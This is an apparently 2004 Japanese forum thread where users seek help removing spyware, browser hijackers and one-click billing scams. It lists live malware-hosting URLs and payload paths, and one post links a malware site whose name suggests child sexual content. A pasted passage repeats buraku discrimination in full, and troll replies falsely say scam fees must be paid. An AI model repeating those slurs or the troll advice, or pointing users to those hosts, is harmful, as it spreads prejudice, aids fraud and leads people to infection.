x.full-tgp.net/?ms.com 【ウィルス名:MHTML.Redir.Exploit トロイの木馬をDLしようとした後、exeファイルを実行させようとする[2004/06/04]】 【インストールされたファイルは削除してもいきなりエロサイトが出てきたり、 このページからヤフーに飛ぼうとしたら以下のエロサイトに行ってしまったりする。 //1-2-3-4-5-6-7-8-9-8-7-6-5-4-3-2-1.sexocean.biz/xxx.htm [2004/07/20]】 【スタートページが www.selfsearch.biz/に固定されてしまう。 パソコンを立ち上げなおすとデスクトップに変なファイルが2つ位出る[2004/07/29]】 ※ 直踏みだとウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1。 真っ白のページだがアラート表示あり。「閉じる」ことができないので強制終了で脱出。 ソースを解析すると2箇所で暗号化された部分があるがそこをデコードすると //81.211.105.37/579/ //pubvic.searchbarcash.com/v2/prompt.php?p=9FD09〜〜 の2つのURLが順に現れてくる。 上のURLは //81.211.105.37/579/ar3.jarをアプレット実行させられる。 このar3.jarはウィルス名:JAVA_BYTEVER.A-1。 このウィルスにより、外部から別の様々なウィルスやスパイウェアをランダムに呼んでくる。 それにより、スタートページが人により色々なサイトに固定されたりし、 症状も人により分散される結果になる。
716 :
709 :04/12/03 00:23:50 ID:rCsLUwFW
>>715 レスありがとうございます!
リカバリというのは、システムの復元で大丈夫なのでしょうか?
何から何まで申し訳ないです。
>>716 勝手に意訳しないように
O S を 一 か ら 入 れ 直 せ
>>713 ギコナビ&バスター使いだけど、ログに誤反応って1回もなかったけどな〜。
719 :
709 :04/12/03 00:41:11 ID:rCsLUwFW
OSを1からですか・・・・。あーやっちまったのか。 色々ありがとうございました。すぐ知らないURL踏まないように これから気をつけます。
720 :
ひよこ名無しさん :04/12/03 01:04:46 ID:8lucpO0k
初めて質問します。 エロサイトみたらウイルスが出て、駆除に成功したのですが、 それ以来、ホームページが海外のマイクロソフトに勝手になるように なりました。インターネットオプションで何回も直すのですが、 閉じるたびにまたホームページが変わってしまいます。 わかる方おりましたらお願いします。
部落差別(B)の最初は仏教絡みの奈良時代、施政者の思惑に反逆した為。下って江戸時代には 関東には時として仏教化の弾圧があったが、市民生活に於いては殆どなかった。 江戸時代に副業として警察・納税の下働きをしていたが、権力を笠に着て不法連行 しては保釈金や米をせびったり、年貢米を横領したりして農民から嫌われていた。 明治4年頃に警察権が司法省に移管してポリス制となり、只の庶民になったBは権 力の後ろ楯が消滅、積年の恨みを晴らす農民等に虐められた訳。 特に関西や西日本は横暴だったらしく手厳しかったらしい ■なぜ部落地区にとどまるのか。 ・優遇されるから。・経済的な面から。 ■優遇を受けることのマイナス点 ・部落の人が差別を受けるのは「地区」として存在する理由が主である。 ・優遇処置を受けることでさらに「地区」が明確化し、さらに地名総監等により企業・民間等に知れ渡り結果として差別につながる。 ■部落差別の主な種類 部落差別は主に以下の項目だと言われているが、「地区」が明らかの故の差別が大半だと考えられる。 ・結婚差別・就職差別・身近な嫌がらせ(落書き等) 部落地域に住む人は、 (1)他の地域の人と結婚できずに同じ部落地域の人と結婚するから子供は近親交配になり知能の低い人間が生まれる。 (2)部落差別により就職などで不利だから、日雇いの仕事や肉体労働しかできず劣悪な生活環境である。 (3)人間的におかしな人が多い。(やくざ、不良)だからできるだけかかわらない方がいいと 親から聞かされました。本当ですか? 部落民を怒らせると後の陰険な嫌がらせが恐いよ〜 個人の間での軽い中傷でも、人権問題だとか、 集団に対する侮辱だとか、地域や職場の問題だとか、 やたら問題を大きくしようとして恐怖感を与えるのが彼らのやり口です。 上記の文章はあるスレッドからのコピー&ペーストです。このような部落差別・部落差別発言をなくしましょう。
723 :
ひよこ名無しさん :04/12/03 11:34:20 ID:BYcjVWZI
それアイコンっつーかレジストリエディタっつー重要アプリだろ・・・
ってことはあっても問題ないってことですね??
なくちゃ困る なんで消そうと思うのかが謎ですよ
つまらないネタが日課になってしまったひとがいますね
728 :
ひよこ名無しさん :04/12/03 13:22:50 ID:dZ8fPvDJ
よろしくお願いします。 仕事で使っているWinNT4.0なんですが タスクバーにいつのまにかCCProxy6.0というものが存在してます。 スタートアップで起動しているようです。 ぐぐっても中国語?の検索結果ばかり出てきて読めません。 これってマズーいものでしょうか? ちなみにナローなのでオンラインスキャンなど激重でちっとも進みません・・・。
729 :
ひよこ名無しさん :04/12/03 14:01:27 ID:o+eoXFt+
はじめて質問させて頂きます。 以前、トロイ等ウイルスが入り、ここを見てspybot等で削除出来たのですが、 最近聞いたこともない会社から、国際電話料金の請求がきたのです。変なサイ トに飛んでいたからだと思いますが、こういう場合払わないといけないのです か?振込先口座も書いてないので。教えてください。
>>728 「CCProxy」でぐぐって出てきた一つ目のページを[このページを訳す BETA]で入ってみ
このソフトがマズイかどうかは分からない。
会社からエロサイト見てビビるくらいなら繋ぐなと テンプレにあった様な気がしたらなかった。
732 :
ひよこ名無しさん :04/12/03 17:57:26 ID:+lOOemQV
Me Internet Explorer 6 sp1 ウイルスバスター2004使用 スパイポッドでスパイウェアを駆除しました。 何回か使っていてわかったのですが、毎回同じスパイウェアが発見されるのです。 DSO Exploit Data source object exploit HKEY_USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Sett これがスパイポッド駆除結果をコピーした物です。 駆除してるのですがこれが毎回検出されます(駆除には成功してます。) 原因はなんなのか教えて下さい。気味が悪いです。 また後で来ますのでよろしくお願いします。
>>732 DSO Exploit は詳細設定の製品の除外でチェックしておけばいいぜ、BOY
735 :
ひよこ名無しさん :04/12/03 21:58:19 ID:DiljgwKr
他板から誘導されてきました。失礼します。 ウィンドウズMeを使っています。機種(?)はNECvaluestarです。Microsoft Internet Explorerを使っています。 パソコンを立ち上げたら、 「FreeXXX」という名前のページ(たぶん海外アダルトサイトだと思うのですが、) が自動で立ち上がるようになってしまい、 「uninstall」や、「disconnect」というボタンを操作して、 アンインストールしても、再起動をかけるとまた同名のページが自動で開いてしまいます。 コントロールパネルから「アプリケーションの削除、追加」を開いて探してみたのですが、 そこには「FeerXXX」という項目は無く、どう消したら良いのか全く解りません。 私がパソコンを開いたときにはすでにこの状態におちいっていて、 話を聞いたら、どうも元凶は弟のようなのですが、 「よく覚えていない」の連発で、 なぜこういうことになってしまったのか詳しく説明できず申し訳ないのですが、 パソコンの動き自体が凄く遅くなってしまい(多分これが原因で)困っています。 どなたか削除のしかたを教えていただけないでしょうか。よろしくお願いします。
737 :
735 :04/12/03 22:39:28 ID:DiljgwKr
>>736 さん
ありがとうございます。
読み込み足りていなくてごめんなさい。
いま486のかたの書かれていた方法を試してみたのですが、
やっぱり状況は変わらなく、
立ち上げる途中でデスクトップにFeer XXXというアイコンができて、
ページが開いてしまいます。
>>737 それやったら動かなくなるよ
まあテンプレきちんと読まないお前が悪いんだけどな
>>740 何でお前が出てくるの?と言ってるんだよ。日本語読めるか?
きょうも馬鹿ばっかだなw
何でおまえにそんなこと言われないといけねえんだよ
>>743 その言葉を待ってたよ。
「まあテンプレきちんと読まないお前が悪いんだけどな 」
↑
何でおまえにそんなこと言われないといけねえんだよ
はいはいわかったから巣に帰れ
ケンカはやめて〜!
>>747 何でおまえにそんなこと言われないといけねえんだよ
なんか一人知障がいるな、スルーでよろ
とまあここまで全部俺の自演なわけだが
757 :
735=737 :04/12/03 23:10:37 ID:DiljgwKr
>>738 さん
736さんに指摘された後、一応、全体に目を通してから試してみたのですが、
(今のところ普通に動いているようです。)
正直なところ、どのかたの書き込みを信用して実行していいのか
(大丈夫、と書いていらっしゃるかたもいますし、)
よく解らなく、とにかく藁にもすがる思いで実行してみたのですが…。
おさわがせしてすみません。
お!なんか香ばしい香りが漂ってますね
>その言葉を待ってたよ。
>「まあテンプレきちんと読まないお前が悪いんだけどな 」
>↑
>何でおまえにそんなこと言われないといけねえんだよ
このあたりなんか
>>746 は決まったとか思ってるんだろうなぁw恥ずかしい限りだ
>>757 とりあえず>1-
>>10 のテンプレを熟読しろ、テンプレを読まずに質問する奴は
>>736 や
>>750 みたいに
ウィルスを貼ったりレジストリをいじらせてPCを起動できないようにする回答しか返ってこないぞ
テンプレに書いてあることをきちんとやればほとんどのことは解決できる
金があれば悩まなくてもいいって事さ
金持っててイケメンならパソコンシコシコ弄ってないよ
766 :
ひよこ名無しさん :04/12/03 23:55:20 ID:SQwqrkGH
すいません、他のスレで聞いたらわからなくて、こちらへ誘導されました。
数週間前から、ネットサーフィンしてて(死語でしょうか)、何か検索して見付からなかったときや、
該当頁が開けなかったとき(ごく普通のサイトで、通常は開けます)、勝手に「Top Web Results:」という
画面になります。
こんな画面です。
ttp://www.yupsearch.com/search.php すべて英語表示なので、海外の検索サイトだと思いますが、
サーチエンジンはいつもグーグルかmsnなので、こんなサイトは開いたこともありません。
画面の左端には、「最近検索された単語」の一覧として、「カジノ」「バイアグラ」「住宅ローン」「車保険」
「クレジット書類」など、まったく心当りないワードが出ています。
日によって、それが別の英単語になったりしますが、"casino"が一番多いです。
その都度、左側に表示される"Recent Searches"の単語も増えたり変わったりしてるようです。
本当に気持ち悪いです。
誰かが検索した痕跡が自分のパソコンに残っているようで、しかも怪しげな内容が多く、
気持ち悪くてしょうがありません。
でも、問い合わせしようにも、どこに訴えていいのかわかりません。ヤフー? IEの発売元?
パソコンのメーカー? どこもピント外れな気がして。困り果てています。
自分のパソコンは誰かに覗かれてるのでしょうか?
何かご存じの方いらっしゃれば、どうか教えて下さい。結構精神的に参ってしまってます。お願いします。
エロサイトを見た記憶はないですが、2ちゃんのリンクとかで勝手につながったのかもしれません。
ちなみに、最近、スパイウェア駆除をしました。また、ノートンでのウイルス検索には何も引っ掛かりません。
長文すいません。どうか宜しくお願い致します。
768 :
766 :04/12/04 00:15:12 ID:l8Fj+Rxm
>>767 >>766 へのレスでしょうか。早速に有難うございます!!
早速、そこの「CoolWebShredderの実行」をやってみたのですが、スムーズにダイアログは進み、
何も起こりません。「CWS.Alfasearchが見つかると再起動がかかります」と書いてありますが、
再起動はかからないので、怪しいスパイウェアはないということでしょうか?
最近、Spybotというソフト?で、スパイウェアの駆除をやったばかりなのですが、
そこで検出できなかった精巧なスパイウェアの仕業という可能性が高いのでしょうか?
他の板で、「レジの書き換えじゃないか?」とも言われましたが、その意味もわかりません。
引き続き、お知恵を拝借致したく存じます。宜しくお願いします。
>>768 順を追って作業を行うことで問題解決,、と書いてねえか?
もう終わったのかよ。ふざけんな。(・∀・)カエレ!!
770 :
766 :04/12/04 00:36:11 ID:l8Fj+Rxm
>>769 それが、すぐに終わってしまったのですが・・・
普通はもっと時間かかるものなのですか?
こないだ駆除作業したばかりだからでしょうか
で、その後も相変わらず、その心当りのない検索サイトは表示されまくってます・・・
771 :
ひよこ名無しさん :04/12/04 00:45:12 ID:SwzevT0U
>>735 おいらはPCの素人だけど、アドバイスしてやろうか?
インターネットオプションでHPの設定を元に戻すのが先決。
それをやらないと、他の作業をいくらやったところで、ネットにつなぐ
たびにそのサイトに自動接続されて種を植え付けられるからいたちごっこになる。
オプションでWEB設定のリセットとHP書き換えをやっても戻せなければ、
それこそまさにスパイウェアの仕業。
この手のスパイウェアは、まず最初にHPを勝手に変更するファイルを植え込むはず。
そこで、感染した日付に作成されたファイルをスタートバーのところで検索する。
その日に自分の明確な意志でダウンロードしたファイルがないようなら、それが
スパイウェア。念のため、出てきたファイル名をgoogleなんかで検索してみる。
もしスパイウェアならすぐに判明する。
断定できたら、すぐにゴミ箱へ。削除できなければセーフモードで削除。
そして、もう一度HP変更を試す。うまくいったら応急処置は完了。
他にも色々あるけど、あとは気長にやっていけばいい。
773 :
ひよこ名無しさん :04/12/04 01:28:55 ID:WGzLaTu1
アダルトサイトに接続した際にスパイウェアに侵入されたらしく、インターネットを起動する際に、「WINDOWSインストーラ、Microsoft offce XP parsonal」というのが起動してしまうようになってしまいました。 どうすれば直せますか? スパイボット、Hijack Thisなどで大体のスパイウェアは削除・修正することができたのですが、これだけは直せませんでした。何かの設定がおかしくなっているのでしょうか? どなたか知ってる方、よろしくお願いいたします。
774 :
ひよこ名無しさん :04/12/04 01:28:56 ID:K6LKG7iy
Internet Explorerのアドレスバーの下に「I SEARCH」の欄が表示されてしまいます。 がんばりましたが解決できないのでどうか具体的に教えてもらえないでしょうか?どうかどうか。
775 :
771 :04/12/04 02:08:08 ID:SwzevT0U
今はスパイウェア駆除ソフトと言う便利なものがあるけど、ちょっと前まではAd-Aware.すらなかったんだぞ。 そのころでもホームページの書き換えや勝手にツールバーが作られたりしたけどな。 でも、いろいろ調べて何とか直せたし。今は便利になったもんだ。
778 :
732 :04/12/04 02:13:45 ID:88IzFF+M
>>733 ありがとうございます。どうやら大丈夫の様ですね
安心しました。
>>734 わかりました、ありがとうございます。
ウイルスバスターでの検索とスパイポッドでの検索でやっとクリーン(?)なPCに戻れました。
779 :
777 :04/12/04 03:29:55 ID:???
782 :
ひよこ名無しさん :04/12/04 11:25:26 ID:5KxFRTZB
783 :
ひよこ名無しさん :04/12/04 11:34:22 ID:5KxFRTZB
なんかかなりヤバそうです。 どなたか助けてください・・(´・ω・`)
>>782 >>7 の下のリンク先を良く読め
それにしても利用規約を一切読まずにあんなもん押すかな?
一応、ちゃんわかりやすい場所に利用規約があるし、内容も無茶じゃないし・・・
785 :
784 :04/12/04 11:43:26 ID:???
>>782 ちなみに「退会させてください!」なんてメール決して送るなよw
786 :
782 :04/12/04 11:44:21 ID:5KxFRTZB
すいません読みました。 この場合やっぱり払わなくちゃいけないんでしょうか?
787 :
ひよこ名無しさん :04/12/04 11:52:48 ID:4plfIXEk
セーフモードについての質問なのですが ヘルプを読みながらやってやり方はわかりました それで [スタート] ボタン、[シャットダウン] の順にクリックし、 ボックスの一覧の [シャットダウン] をクリックします。 とあるのですがボックスにシャットダウンなるものがないのですが これは終了オプションでいいのでしょうか?
788 :
784 :04/12/04 11:53:01 ID:???
789 :
782 :04/12/04 11:55:45 ID:5KxFRTZB
>>784 さん
教えてくれてありがとうございます。
でもやっぱり請求はきますよね?
790 :
784 :04/12/04 12:01:06 ID:???
>>782 利用規約読んだだけだから押した後の処置はわからないけど、
その後に個人情報とか入力したわけではないんでしょ?
だったら請求のしようがないよ。
ただし、何らかの方法(正式手続きでISPへの開示請求)で相手が知った場合、
>>782 が無効を主張出来るかどうかは自信が無い。
クリックの真上に利用規約が書かれてるし、同意したことになってるからな。
791 :
782 :04/12/04 12:17:49 ID:5KxFRTZB
押した後登録完了みたいなのがでてあせって即閉じました。 ぱっと見でIP見たいなのとか何個かが出てた気がします。 請求がこない事を祈ります・・ はぁ鬱だ・・
↑ここ読んでもちつきました。ありがとうございました。
795 :
691 :04/12/04 17:00:50 ID:ExXUCAVd
以前下記の質問をさせていただいた者ですが、 >spybotをダウンロードしようとすると、「ファイルをコピーできません。 >送り側のファイルまたはディスクから読み取れません」と出てしまうのですが、どうすればいいでしょうか? やはり状況が改善されない上に、被害対策の部屋で紹介されているほかのソフトをダウンロードしようとしても同じようになってしまいます。 どなたかアドバイスをお願いします。
>>795 レジストリいじられたり、ホストファイル操作されたりしてるんだろ。
初心者がなおすのは無理だと思われ。リカバリすれば元に戻る。
>>795 というか、テンプレのリンク全部まともに見ていれば
君のようなケースの対処法が載っているし、それをやったけど
ダメでした、とか書くのがふつうなんじゃない?
798 :
795 :04/12/04 17:22:16 ID:kPEinOY1
>>796 リカバリした方が良いのであればそうしたいとおもいます。
>>797 すみません。テンプレよく読んでませんでした。
よく読んでみて、駄目な場合はリカバリする方向で考えます。
お騒がせしてすみませんでした。
799 :
798 :04/12/04 17:27:59 ID:???
すみません!
慌てて自分のレスでもないのにトンチンカンなことしてしまいました。
自分は、他のスレに質問をしたものです。なんか、勘違いして書き込んでいました。
>>795 さん、ごめんなさい。
>>796 さん、
>>797 さん、ごめんなさい。
800 :
ひよこ名無しさん :04/12/04 17:29:54 ID:4OIc6FNV
802 :
ひよこ名無しさん :04/12/04 17:42:09 ID:4OIc6FNV
いや、あまりに不安で だいじょぶなんかなあ?
>>802 とりあえず向こうで答えてくれた人にそりゃ失礼っつうもんだ。
ここでの質問を取り消すか、向こうでやり直すかしないと
答えられん。俺はその答えを知っている。
804 :
ひよこ名無しさん :04/12/04 17:54:43 ID:35Xg7beX
about:blankが乗っ取られたようで、WindowsUpdateができず、大変困っています。 【症状】 IEを起動すると「Serch for」という見出しの海外(?)検索サイトに勝手に飛ぶ さらに、英語で「スパイウェアに犯されている」旨のポップアップが表示 起動URLを指定しても、勝手にabout:blankになり、上記症状になる。 Windows Updateを実施しようとすると、勝手に「Serch for」画面に飛び実施不可 【環境】 WindowsXP sp2、IE6.0 sp2 【修復努力】 1),2)実施、3),4)対象外 5)AntiVirus2004最新Update版で検索すると1件表示 C:\WINDOWS\system32\ocl.dll アドウェアが見つかりました。脅威名:Adware.MainSearch しかし削除しようと「削除できませんでした」で削除不可(これが犯人?) 6)HPに「CoolWebShredder」が見つかりません。ADS Spyが該当でしょうか? 7)Ad-aware6.0とSpybotS&D1.3実施。やるたびにいろいろ見つかるが、全部正常に削除できる。 8)一番古い日付でシステム復元するもNG。今は戻してます。 9)「最初にここを見て駆除」→勝手に「Serch for」の画面に飛んでしまいます 「再発する場合には、ここを見て該当ファイルを駆除」→403 Forbiddenになる 「xxxxxの除去方法」→403 Forbiddenになる 10)HPに「HijackThis」が見つかりません。 「自動的に診断してくれるページがあるので、ここにログを貼って診断してみる」 すみません、どのページでしょうか? 初心者で至らない部分ありかと思いますが、ご教授のほど、よろしくお願いします。
805 :
804 :04/12/04 18:02:21 ID:35Xg7beX
>>804 補足です。
>しかし削除しようと「削除できませんでした」で削除不可(これが犯人?)
しかし削除しようとすると、の誤りです。
> 6)HPに「CoolWebShredder」が見つかりません。ADS Spyが該当でしょうか?
文字列検索しても見つかりません。
>10)HPに「HijackThis」が見つかりません。
文字列はあったけど、ダウンロードするものが見つかりません。
806 :
804 :04/12/04 18:04:40 ID:35Xg7beX
>>7 のスパイウェア除去ウィザードをまだやってなかったので、
これからやってみます。
807 :
804 :04/12/04 18:34:35 ID:35Xg7beX
>>7 のスパイウェア除去ウィザードをやったら治りました。
WindowsUpdateも正常です。
問題の、C:\WINDOWS\system32\ocl.dll も消えています。
なぜ、ノートンやAd-awareやSpybotS&Dで駄目なのかはわかりませんが。
お騒がせしました。
808 :
ひよこ名無しさん :04/12/04 20:19:38 ID:8Y3/SDdh
質問です。
>>581 さんのようにplaypocketやsecurity云々の広告が出てきます。
消す方法はないでしょうか?
昨日画像BBS行ったらウィルス化してて、それが原因でしょうか…
ノートン先生や他のソフト使ってもダメだし、いろいろなサイトに載ってる方法を試しても未だ直らず…
一昨日はスパイウェアにかかってPCフォーマットしたばかりだし…orz
解決策を是非教えてください!お願いします!
|∧ | .∧ | ∧ | ヽ | .\ ・・・・・・・・・・・・・・・・・・・・・・・・ |=・=- ∧/ ∧ | / ヽ / ヽ | / ヽ_____/ ヽ |/ \ | ヽ |"´) ● \─/ ● |'´) |‐´ ヽ/ /´ |\ /
811 :
ひよこ名無しさん :04/12/04 22:17:55 ID:t72vJgpw
018 - Filter:text/html (略) D:\WINNT\
http:filer.dll をいくらHijackthisで消しても消えないのはどうしてでしょうか
削除しないから
813 :
811 :04/12/04 22:25:19 ID:t72vJgpw
毎回チェックはしてるんですよね
814 :
811 :04/12/04 22:28:16 ID:t72vJgpw
815 :
ひよこ名無しさん :04/12/04 22:39:10 ID:d89lXIaF
俺の姉者がウィルスに引っかかったんですよ。 何をしてもだめで、IEくらいしかできることがないんですよ。 オンラインスキャンしても全然除去できないんですよ。 SET UP EXEとかも開こうとすると「エラー、再起動してください」 ってでるんですよ。 アンチウィルスは導入していません。どうしたらいいですか?
816 :
808 :04/12/04 22:43:03 ID:8Y3/SDdh
play pokerだった… >809さん。ありがとう 「mozilla firefox」を導入して関連付けもしたけどまだ開く… マシンがXPだからIE消せないっぽいし…
818 :
815 :04/12/04 22:46:15 ID:d89lXIaF
>>814 ファイルを削除しないと意味がないよ。
bms.dllもスパイウェア。基本的な使い方勉強してからやってね。
820 :
811 :04/12/04 22:50:07 ID:t72vJgpw
なるほど チェックするだけではダメなんですね 失礼しました
822 :
815 :04/12/04 22:51:52 ID:d89lXIaF
業者って・・・?? ホント初心者ですいません・・・
824 :
ひよこ名無しさん :04/12/05 02:00:45 ID:y98tNfCP
>>820 (=^u^=) 819さんの指摘どうり↓もスパイウェアなりよ。
O2 - BHO: (no name) - {C18517DA-CA70-46CE-86F4-882F6B62E975} - D:\PROGRA~1\UBIZNA~1\MyKey\bms.dll
O4 - HKLM\..\Run: [KeyAgent] D:\Program Files\UBizNames\MyKey\keylaunch.exe
(=^u^=) その018はパグじゃなくて本物なりね
削除できることを祈るなりよ。
826 :
811 :04/12/05 04:54:13 ID:dLrKlHIg
う・・・バグと本物があるのか とりあえずUbiznameつーファイルがあってなかなか消せないです… ページが異様に重いのはこのせいですね いろいろと調べて削除がんばります
827 :
ひよこ名無しさん :04/12/05 05:11:27 ID:4USdrcfA
初心者なのですがこのサイトも架空請求 ですか??ENTER押したら登録になって しまいました・・・。IPアドレスがばれて しまい非常に怖いです・・・。やはり放置し といていいのでしょうか??お願いします。
828 :
ひよこ名無しさん :04/12/05 05:13:15 ID:4USdrcfA
>>827 どのサイトか知らんが、自分で住所などを入力しなければ相手は請求のしようが無い。
クリックする画面に利用規約などが無ければ、契約したことにはならない。
>>827 朝っぱらからテンプレ読めとか言いたくないから答えてあげよう。
完全無視でOK。メールで問い合わせる等ちょっとでもリアクションおこしたら
「お?こいつはカモに出来そうだ」ってマークされて追っかけてくる。
IPから住所、氏名特定するのはかなり困難(法的手段を踏まないと無理)だし、
なにより、そんなワンクリックで契約なんてそもそも成立しない。放置汁。
833 :
ひよこ名無しさん :04/12/05 09:52:32 ID:VqolFIZb
Ad-awareSEを使ってみたのですが消しても消してもまた元に戻っていまいます どなたか助けてください・・・
836 :
833 :04/12/05 12:50:33 ID:???
ハナクソーーーーーーーー
なんでOpera房は立ち入り禁止なんですか?
Opera使いがスレを荒らしているという、被害妄想からだと思われ。 これでテンプレつくる奴の頭の程度が解る。
>>840 |∧
| .∧
| ∧
| ヽ
| .\ ・・・・・・・・・・・・・・・・・・・・・・・・
|=・=- ∧/ ∧
| / ヽ / ヽ
| / ヽ_____/ ヽ
|/ \
| ヽ
|"´) ● \─/ ● |'´)I
|‐´ ヽ/ /´
|\ /
超好奇心旺盛な俺は、DARK LOLITASというサイトに飛んで見た。
DARK LOLITAS…ウィルス・スパイウェアが仕込まれているサイトだ。
そのサイトに行く前に、ActiveXとJAVAとスクリプトとページの自動読み込みとファイルのダウンロードを
全て無効に設定しかつすべてのCookieをブロックしてから飛んでみた。
使用しているアンチウィルスソフトはマカフィー。updateもしており現在最新の定義だ。
無論WindowsのUpdateも行なっている。
多少は不安だったが意を決してDARK LOLITASに突入。
ActiveXは無効にしてあるので、「現在の設定では実行できません」という
メッセージが出たのでOKをクリック。次にマカフィーがトロイの木馬を検出。
場所はC:\WINDOWS\Local Settings\Temporary Internet Filesなので
インターネットオプションを選んでファイルを削除。
セキュリティ対策をきちんと施していれば恐れる事なんて無いのだよ。
http://bbslolita.18.to/
843だがもうひとつファイアーウォールも入れており、セキュリティのレベルは 「厳重セキュリティ」に設定した。 やられてからでは遅いのでこれでもかと言うくらい対策を取れ。
_____ /。 \ / \ / ┏━━━━━┓ | ┃ ● |● | | ┃ | \__/| | \┃ \___ / | え? \ /
嬉々として黒ロリ直リンを貼り付けてる厨房がいまつね^^
>多少は不安だったが意を決してDARK LOLITASに突入。 プ
悩殺ショットってとこ もひどいよ
849 :
ひよこ名無しさん :04/12/06 22:16:49 ID:6cViqQoe
エロサイトいって、間違えてエンター押したらIPアドレス が表示されて、「入会しました。いつまでにお金を振り込んでください って出たんだけど、これ払わなきゃだめなんですか?
ちなみに悩殺ショットってところのなかの 違うサイトで脱会ってところクリックして読もうとしたら 入会もしていないのにあなたのIPは○○って出てた なんじゃそれ・・
実際払わなくてはいけないアダルトサイトってどういう場合ですか? 書き込むところがあって、入会や登録に必要とされるようなことを 自分から書き込んだ場合ですか?
恥ずかしながらPCからアダルトサイト見てて そんな気は無いのに登録しましたって出たんですけど(分かりにくくどこかに○○に同意して方だけお入りくださいってかいていたような・・) これって電話番号やメールアドレス知られてしまってるんでしょうか?
もちろんそうよ
855 :
ジャボン :04/12/06 23:10:20 ID:YdZDlLTF
2−10をよんで書いてなかったので質問なんですが、いまPCを開くと、エロサイトに つながるWEBが出てきます(起動スピードも遅くなった・・・)。たしか「ファイル名を指定して実行」にあるプログラム名を入れて 操作できるというのは聴いたことがあるんですが、名前を忘れてしました。教えてください! 文章がめちゃめちゃですいません。
857 :
ひよこ名無しさん :04/12/07 01:18:07 ID:NuOaX1ns
ちょっと質問なんですけど外人のエロサイト見てから二日後にインターネットしようと思ってインターネットエクスプローラをクリックしたら、いつもならビックローブのトップが出るのに、aboutblankってなるんです。これってなんでしょうか?
>>857 とっても便利で親切な無料サービスです。活用しましょう。
859 :
ひよこ名無しさん :04/12/07 02:14:31 ID:NuOaX1ns
>>858 さんaboutblankをもとの検索エンジンのトップに戻すにはどうやればいいんですか?
書いてあるのに聞くなよ。
861 :
ひよこ名無しさん :04/12/07 02:26:19 ID:NuOaX1ns
>>2 のやつですか?やってみます。また質問で恐縮なんですけどaboutblankってなんすかね?
863 :
ひよこ名無しさん :04/12/07 02:35:00 ID:NuOaX1ns
864 :
ひよこ名無しさん :04/12/07 03:07:07 ID:l/KhYph1
たぬたんって優しいよねえ^^
それはどうかな。
866 :
ひよこ名無しさん :04/12/07 06:07:46 ID:3ICZJq3O
867 :
ひよこ名無しさん :04/12/07 06:09:16 ID:3ICZJq3O
ちなみに、こちらのカード番号等は一切入力しておりません。 こういったケースでも、支払い対象になるのでしょうか? お願いします。
>>867 もちろん、同意したのだから対象になる。
早めに払っとけよ。
870 :
ひよこ名無しさん :04/12/07 07:33:30 ID:3ICZJq3O
>>868-869 そ、そうなのですか?
なんとかクーリングオフする方法とかないのでしょうか?
>>870 30秒くらいでもいいからこのスレ読めよ。
>>870 解決方法知ってるけど、お前のその自分で何とかしようとしないで100%人に頼ろうとするその態度が気に食わない
だからテンプレ読まないでいきなり質問書いてきたんだろ?
∧ ∧
>>870 ( ^Д^) プギャ
_| m9/(___
/ └-(____/
<⌒/ヽ-、___
/<_/____/
zzz
<⌒/ヽ-、__
/<_/____/
.:| . :| .! .l .l .i::l
.:| .__| :| .i .i .|.:!
.:|::||□|〜〜〜〜
└l[ ̄]-e――――
~<⌒/⌒ヾ-、_
/<_/____ノ
 ̄ ̄ ̄ ̄ ̄ ̄~
>>874 ,. -==、、_
,.-'"  ̄ ` `ヽ、
/ / 、 ヽ ____,..rγi,..,___
// / /〃l l l トヽヽヽ |  ̄∪ ̄ |
l' l〃! l /'//' /l,l l l ヽ!. | |
λ. l l,x=、〃/,,r'=-、/、 l | 知ってるが. |
l ヽ l 、,,.=、、'"´ _'.._'`ヽ メ | |
l/'(ゝ" ` , "⌒`" ;'l/.. .| お前の態度が. |
lゝ‐、r,ー-- --‐っ lソ | |
ヽlヽヽ、二__二ノノ.... | 気に入らない. |
/!~{、` 7.、=ニ'、 _,.-'".|,.-ぅ. |
,. -< \7).ヽrノヽ、ヾー''", ,.// |
/ ヽ l ̄~`!ヽ. K l ./ ニユ ですか? |
! ヽ\ l-{__lヽ l _/ ニ」. |
l ヽl /ヽ/ト、 〉! l‐'/、 ./`"  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ト、 ヽ L l }/l./´~ヽゝ'"
.l ヽ、 ヽ、 l`lo/ o〉
l \ 〃ー'" o/
877 :
ひよこ名無しさん :04/12/07 08:47:17 ID:3ICZJq3O
>>873 いえ、一応テンプレ読んだのですが、有料であるという内容が
明記されているという点があるので、支払い義務が生じるのか
どうかわからないので、教えていただきたいのですが。
>>874 お願いです、教えてください。
あんな規約なんぞ無いのと同じ サイト見ておかしいと気づけ やつらは犯罪者だ
879 :
ひよこ名無しさん :04/12/07 11:51:25 ID:NuOaX1ns
インターネットオプションでホームページの設定でどうやるんすかね?
わーい
882 :
ひよこ名無しさん :04/12/07 12:32:44 ID:NuOaX1ns
aboutblankをインターネットのプロパティ→全般で何回元に戻してもなるのですがどうしたらよいでしょうか…
884 :
ひよこ名無しさん :04/12/07 12:40:23 ID:NuOaX1ns
>>883 さん、読んだんですけどwebsearch型とかじゃなくて普通のblankなんすよ。掃除とか一通りやってみたんですけど。
885 :
ひよこ名無しさん :04/12/07 12:42:24 ID:NuOaX1ns
それと携帯からじゃ対策法見れんみたいで…
汁かよ木瓜
>>885 電話が使えるのなら業者を呼んで直してもらうといいよ
荒れるかもしれないが、882に一言言わせてくれ。 リカバリ汁。
890 :
ひよこ名無しさん :04/12/07 16:00:52 ID:8pbHRO90
助けてください! デスクトップに「Orgsm」というアイコンが出てきて消してもまた出てきてしまいます それにインターネットエクスプローラーを開くとアダルトサイトが開いたりします
893 :
ひよこ名無しさん :04/12/07 17:40:32 ID:cIdLWev/
自分は質問はしていませんが、このスレとテンプレサイト見てたら クールウェブなんとかをセーフモードとスパイボットで削除できました まだ問題は残っているようですが、とりあえずなんとかなったので一安心です ありがとうございました
なんか今帰ってきたら、居間に架空請求の葉書があったw こーいうの解ってても、一瞬「えっ!?」とか思っちゃうね。 親父があわてて電話して無ければ良いんだけど・・・
>>895 金で解決というのも正しい方法なのでテンプレ入り希望。
テンプレを見ない奴は全員ここに誘導すればいい。
なんか、いろんな業者がこのスレに売り込みに来そうだなぁ〜。 あぁ、実はもう来てるのか・・・。
マジに受けて本当に業者に頼む奴が出てきたりして・・・
901 :
ひよこ名無しさん :04/12/08 00:31:54 ID:zx5TIYmb
